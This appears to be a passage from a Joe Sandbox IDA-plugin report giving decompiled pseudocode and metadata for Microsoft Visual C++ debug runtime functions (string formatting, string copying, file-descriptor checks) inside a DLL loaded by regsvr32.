                                                      				_a1504 = 1;
                                                      				_t268 = _a1504;
                                                      				_a1344 = _t268;
                                                      				if (_a1344 != 0) goto 0xf9d3ed13;
                                                      				_t370 = L"((state == ST_NORMAL) || (state == ST_TYPE))";
                                                      				_a32 = _t370;
                                                      				r9d = 0;
                                                      				r8d = 0x8f5;
                                                      				0xf9d2b3b0();
                                                      				if (_t268 != 1) goto 0xf9d3ed13;
                                                      				asm("int3");
                                                      				if (_a1344 != 0) goto 0xf9d3ed6f;
                                                      				0xf9d2ab30();
                                                      				 *_t370 = 0x16;
                                                      				_a32 = 0;
                                                      				r9d = 0x8f5;
                                                      				E000007FE7FEF9D2BD70(L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
                                                      				_a1376 = 0xffffffff;
                                                      				E000007FE7FEF9D26800( &_a120);
                                                      				goto 0xf9d3ed8e;
                                                      				_a1380 = _a1200;
                                                      				E000007FE7FEF9D26800( &_a120);
                                                      				return E000007FE7FEF9D23280(_a1380, 2, 2, _a1512 ^ _t400, L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
                                                      			}














                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: get_int64_arg
                                                      • String ID: ("Incorrect format specifier", 0)$9$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                      • API String ID: 1967237116-1983305044
                                                      • Opcode ID: 2a7d659c8e5e6b28fc7c58fcf8e8579ea91b99a8d6af850dbdc893ea63a98b90
                                                      • Instruction ID: 6542cf9ee6a066de1e86aade3174812d6b56db97d2698e01b13d8cfaf3a7b086
                                                      • Opcode Fuzzy Hash: 2a7d659c8e5e6b28fc7c58fcf8e8579ea91b99a8d6af850dbdc893ea63a98b90
                                                      • Instruction Fuzzy Hash: 20F1E872A0DAC58AE7B18B55E8417AFB7E0F784346F200125E6C987AE9EB7DD440CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter
                                                      • String ID: (((_Src))) != NULL$((_Dst)) != NULL && ((_SizeInWords)) > 0$(L"Buffer is too small" && 0)$(L"String is not null terminated" && 0)$Buffer is too small$String is not null terminated$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\tcscat_s.inl$wcscat_s
                                                      • API String ID: 2123368286-3477667311
                                                      • Opcode ID: b8fc4c6395d55294f14e808969fd0dde924ec27b835ffc5b45b9a86212572efe
                                                      • Instruction ID: b03569ffd57b7167c314fdf02ed50a447cb54ce8ebbf145893a20e686b3b9740
                                                      • Opcode Fuzzy Hash: b8fc4c6395d55294f14e808969fd0dde924ec27b835ffc5b45b9a86212572efe
                                                      • Instruction Fuzzy Hash: BFF13832A0DB8685EBE08B19E94476EA3E0F385795F604535D6DE83BA8DF7ED044CB01
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter
                                                      • String ID: (((_Src))) != NULL$((_Dst)) != NULL && ((_SizeInBytes)) > 0$(L"Buffer is too small" && 0)$(L"String is not null terminated" && 0)$Buffer is too small$String is not null terminated$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\tcscat_s.inl$strcat_s
                                                      • API String ID: 2123368286-1420200500
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: Locale$UpdateUpdate::~__get_printf_count_output_invalid_parameterget_int64_argwctomb_s
                                                      • String ID: ("'n' format specifier disabled", 0)$("Incorrect format specifier", 0)$-$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                      • API String ID: 2560055391-3497434347
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: __doserrno$_invalid_parameter
                                                      • String ID: ("Invalid file descriptor. File possibly closed by a different thread",0)$(_osfile(fh) & FOPEN)$(fh >= 0 && (unsigned)fh < (unsigned)_nhandle)$_lseeki64$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\lseeki64.c
                                                      • API String ID: 747159061-1442092225
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: _exit_invoke_watson_if_error_invoke_watson_if_oneof
                                                      • String ID: Module: $(*_errno())$...$Debug %s!Program: %s%s%s%s%s%s%s%s%s%s%s%s(Press Retry to debug the application)$Microsoft Visual C++ Debug Library$_CrtDbgReport: String too long or IO Error$__crtMessageWindowA$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgrpt.c$strcpy_s(szOutMessage, 4096, "_CrtDbgReport: String too long or IO Error")
                                                      • API String ID: 1778837556-2487400587
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: DecodePointer$Locale$UpdateUpdate::~__invalid_parameterwctomb_s
                                                      • String ID: ("Incorrect format specifier", 0)$-$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                      • API String ID: 83251219-3442986447
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter
                                                      • String ID: ("Invalid file descriptor. File possibly closed by a different thread",0)$(_osfile(filedes) & FOPEN)$(filedes >= 0 && (unsigned)filedes < (unsigned)_nhandle)$_commit$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\commit.c
                                                      • API String ID: 2123368286-2816485415
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: __doserrno$_invalid_parameter
                                                      • String ID: ("Invalid file descriptor. File possibly closed by a different thread",0)$(_osfile(fh) & FOPEN)$(fh >= 0 && (unsigned)fh < (unsigned)_nhandle)$_close$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\close.c
                                                      • API String ID: 747159061-2992490823
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: Locale$UpdateUpdate::~__get_printf_count_output_invalid_parameterget_int64_arg
                                                      • String ID: ("'n' format specifier disabled", 0)$("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                      • API String ID: 1328470723-1899493600
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide$AllocaMarkStringmalloc
                                                      • String ID:
                                                      • API String ID: 2352934578-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter
                                                      • String ID: (((_Src))) != NULL$((_Dst)) != NULL && ((_SizeInWords)) > 0$(L"Buffer is too small" && 0)$Buffer is too small$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\tcsncpy_s.inl$wcsncpy_s
                                                      • API String ID: 2123368286-322314505
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: DecodePointer$Locale$UpdateUpdate::~__invalid_parameter
                                                      • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                      • API String ID: 1139040907-3988320827
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter
                                                      • String ID: (((_Src))) != NULL$((_Dst)) != NULL && ((_SizeInWords)) > 0$(L"Buffer is too small" && 0)$Buffer is too small$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\tcscpy_s.inl$wcscpy_s
                                                      • API String ID: 2123368286-3300880850
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter
                                                      • String ID: (((_Src))) != NULL$((_Dst)) != NULL && ((_SizeInBytes)) > 0$(L"Buffer is too small" && 0)$Buffer is too small$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\tcscpy_s.inl$strcpy_s
                                                      • API String ID: 2123368286-3045918802
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 15%
                                                      			E000007FE7FEF9D3F000(long long __rcx, signed char* __rdx, long long __r8, long long __r9, long long _a8, signed char* _a16, long long _a24, long long _a32) {
                                                      				intOrPtr _v24;
                                                      				long long _v32;
                                                      				intOrPtr _v36;
                                                      				intOrPtr _v40;
                                                      				intOrPtr _v44;
                                                      				intOrPtr _v48;
                                                      				intOrPtr _v52;
                                                      				intOrPtr _v56;
                                                      				char _v88;
                                                      				intOrPtr _v96;
                                                      				long long _v104;
                                                      				void* _t80;
                                                      				void* _t81;
                                                      				void* _t89;
                                                      				void* _t92;
                                                      				intOrPtr _t102;
                                                      				intOrPtr* _t136;
                                                      				intOrPtr* _t137;
                                                      				intOrPtr* _t139;
                                                      				signed char* _t141;
                                                      				intOrPtr* _t142;
                                                      				intOrPtr* _t143;
                                                      				intOrPtr* _t144;
                                                      				intOrPtr* _t148;
                                                      				intOrPtr* _t149;
                                                      
                                                      				_a32 = __r9;
                                                      				_a24 = __r8;
                                                      				_a16 = __rdx;
                                                      				_a8 = __rcx;
                                                      				if (_a16 == 0) goto 0xf9d3f031;
                                                      				if (_a24 != 0) goto 0xf9d3f038;
                                                      				goto 0xf9d3f31a;
                                                      				_t136 = _a16;
                                                      				if ( *_t136 != 0) goto 0xf9d3f066;
                                                      				if (_a8 == 0) goto 0xf9d3f05f;
                                                      				 *_a8 = 0;
                                                      				goto 0xf9d3f31a;
                                                      				0xf9d266b0();
                                                      				_t80 = E000007FE7FEF9D26840(0,  &_v88);
                                                      				_t137 =  *_t136;
                                                      				if ( *((intOrPtr*)(_t137 + 0x10c)) == 1) goto 0xf9d3f0d2;
                                                      				_t81 = E000007FE7FEF9D26840(_t80,  &_v88);
                                                      				if ( *((intOrPtr*)( *_t137 + 0x10c)) == 2) goto 0xf9d3f0d2;
                                                      				_t139 = L"_loc_update.GetLocaleT()->locinfo->mb_cur_max == 1 || _loc_update.GetLocaleT()->locinfo->mb_cur_max == 2";
                                                      				_v104 = _t139;
                                                      				r9d = 0;
                                                      				r8d = 0x47;
                                                      				0xf9d2b3b0();
                                                      				if (_t81 != 1) goto 0xf9d3f0d2;
                                                      				asm("int3");
                                                      				E000007FE7FEF9D26840(0,  &_v88);
                                                      				if ( *((intOrPtr*)( *_t139 + 0x14)) != 0) goto 0xf9d3f121;
                                                      				if (_a8 == 0) goto 0xf9d3f106;
                                                      				_t141 = _a16;
                                                      				 *_a8 =  *_t141 & 0x000000ff;
                                                      				_v56 = 1;
                                                      				E000007FE7FEF9D26800( &_v88);
                                                      				goto 0xf9d3f31a;
                                                      				E000007FE7FEF9D26840(_v56,  &_v88);
                                                      				if (E000007FE7FEF9D32B90( *_a16 & 0x000000ff, _t141, _t141) == 0) goto 0xf9d3f276;
                                                      				_t89 = E000007FE7FEF9D26840(_t88,  &_v88);
                                                      				_t142 =  *_t141;
                                                      				if ( *((intOrPtr*)(_t142 + 0x10c)) - 1 <= 0) goto 0xf9d3f1f3;
                                                      				E000007FE7FEF9D26840(_t89,  &_v88);
                                                      				_t143 =  *_t142;
                                                      				if (_a24 -  *((intOrPtr*)(_t143 + 0x10c)) < 0) goto 0xf9d3f1f3;
                                                      				if (_a8 == 0) goto 0xf9d3f191;
                                                      				_v36 = 1;
                                                      				goto 0xf9d3f199;
                                                      				_v36 = 0;
                                                      				_t92 = E000007FE7FEF9D26840( *((intOrPtr*)(_t143 + 0x10c)),  &_v88);
                                                      				_t144 =  *_t143;
                                                      				_v32 = _t144;
                                                      				E000007FE7FEF9D26840(_t92,  &_v88);
                                                      				_v96 = _v36;
                                                      				_v104 = _a8;
                                                      				r9d =  *((intOrPtr*)(_v32 + 0x10c));
                                                      				if (MultiByteToWideChar(??, ??, ??, ??, ??, ??) != 0) goto 0xf9d3f247;
                                                      				E000007FE7FEF9D26840(_t94,  &_v88);
                                                      				if (_a24 -  *((intOrPtr*)( *((intOrPtr*)( *_t144)) + 0x10c)) < 0) goto 0xf9d3f221;
                                                      				_t148 = _a16;
                                                      				if ( *((char*)(_t148 + 1)) != 0) goto 0xf9d3f247;
                                                      				0xf9d2ab30();
                                                      				 *_t148 = 0x2a;
                                                      				_v52 = 0xffffffff;
                                                      				E000007FE7FEF9D26800( &_v88);
                                                      				goto 0xf9d3f31a;
                                                      				E000007FE7FEF9D26840(_v52,  &_v88);
                                                      				_t149 =  *_t148;
                                                      				_v48 =  *((intOrPtr*)(_t149 + 0x10c));
                                                      				E000007FE7FEF9D26800( &_v88);
                                                      				_t102 = _v48;
                                                      				goto 0xf9d3f310;
                                                      				if (_a8 == 0) goto 0xf9d3f28b;
                                                      				_v24 = 1;
                                                      				goto 0xf9d3f293;
                                                      				_v24 = 0;
                                                      				E000007FE7FEF9D26840(_t102,  &_v88);
                                                      				_v96 = _v24;
                                                      				_v104 = _a8;
                                                      				r9d = 1;
                                                      				if (MultiByteToWideChar(??, ??, ??, ??, ??, ??) != 0) goto 0xf9d3f2f8;
                                                      				0xf9d2ab30();
                                                      				 *((intOrPtr*)( *_t149)) = 0x2a;
                                                      				_v44 = 0xffffffff;
                                                      				E000007FE7FEF9D26800( &_v88);
                                                      				goto 0xf9d3f31a;
                                                      				_v40 = 1;
                                                      				E000007FE7FEF9D26800( &_v88);
                                                      				goto 0xf9d3f31a;
                                                      				return E000007FE7FEF9D26800( &_v88);
                                                      			}





























                                                      APIs
                                                      Strings
                                                      • f:\dd\vctools\crt_bld\self_64_amd64\crt\src\mbtowc.c, xrefs: 000007FEF9D3F0B9
                                                      • _loc_update.GetLocaleT()->locinfo->mb_cur_max == 1 || _loc_update.GetLocaleT()->locinfo->mb_cur_max == 2, xrefs: 000007FEF9D3F0A4
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: Locale$UpdateUpdate::~_$ByteCharMultiWide
                                                      • String ID: _loc_update.GetLocaleT()->locinfo->mb_cur_max == 1 || _loc_update.GetLocaleT()->locinfo->mb_cur_max == 2$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\mbtowc.c
                                                      • API String ID: 3162172745-1617866167
                                                      • Opcode ID: 1f8ba6bd668c859fdc1c929c81f91c7de023d0dcacf149bd6155c41000b32a69
                                                      • Instruction ID: 684ba7971de88d1067c150b2dc8aa1ec623b130c6e00156a0851ae80eca3a1f6
                                                      • Opcode Fuzzy Hash: 1f8ba6bd668c859fdc1c929c81f91c7de023d0dcacf149bd6155c41000b32a69
                                                      • Instruction Fuzzy Hash: A9913C32A1C78586E7A0DB19E8507AEB7E0F785B45FA08136E6CD837A5DB3ED444CB40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: Locale$UpdateUpdate::~_$_invoke_watson_if_oneof_swprintf_p
                                                      • String ID: $ Data: <%s> %s$%.2X $(*_errno())$_printMemBlockData$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c
                                                      • API String ID: 792801276-1329727594
                                                      • Opcode ID: 3bedb609291a4b858326ef236c1a71752733cc22d3f81b148e8b3570f3bc9f75
                                                      • Instruction ID: 74944a5c68176a92a31906070f765b18f74d9586b7891cebb3d67554b9ce35f5
                                                      • Opcode Fuzzy Hash: 3bedb609291a4b858326ef236c1a71752733cc22d3f81b148e8b3570f3bc9f75
                                                      • Instruction Fuzzy Hash: B2613872A0D7C186E7B49B10E8907AEBBA0F784740FA18126D6CD47BA9DB3ED404CF40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: __doserrno$_invalid_parameter
                                                      • String ID: (_osfile(fh) & FOPEN)$(fh >= 0 && (unsigned)fh < (unsigned)_nhandle)$_get_osfhandle$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\osfinfo.c
                                                      • API String ID: 747159061-3177431134
                                                      • Opcode ID: a294e87af6799fd5b40bd152d4ba1c080b88c0b0971c2ee76bd3c9e1fffa8bcc
                                                      • Instruction ID: efe890aaf17933dee885bd0091a5358479214bdc632742ad2579ba78141b5705
                                                      • Opcode Fuzzy Hash: a294e87af6799fd5b40bd152d4ba1c080b88c0b0971c2ee76bd3c9e1fffa8bcc
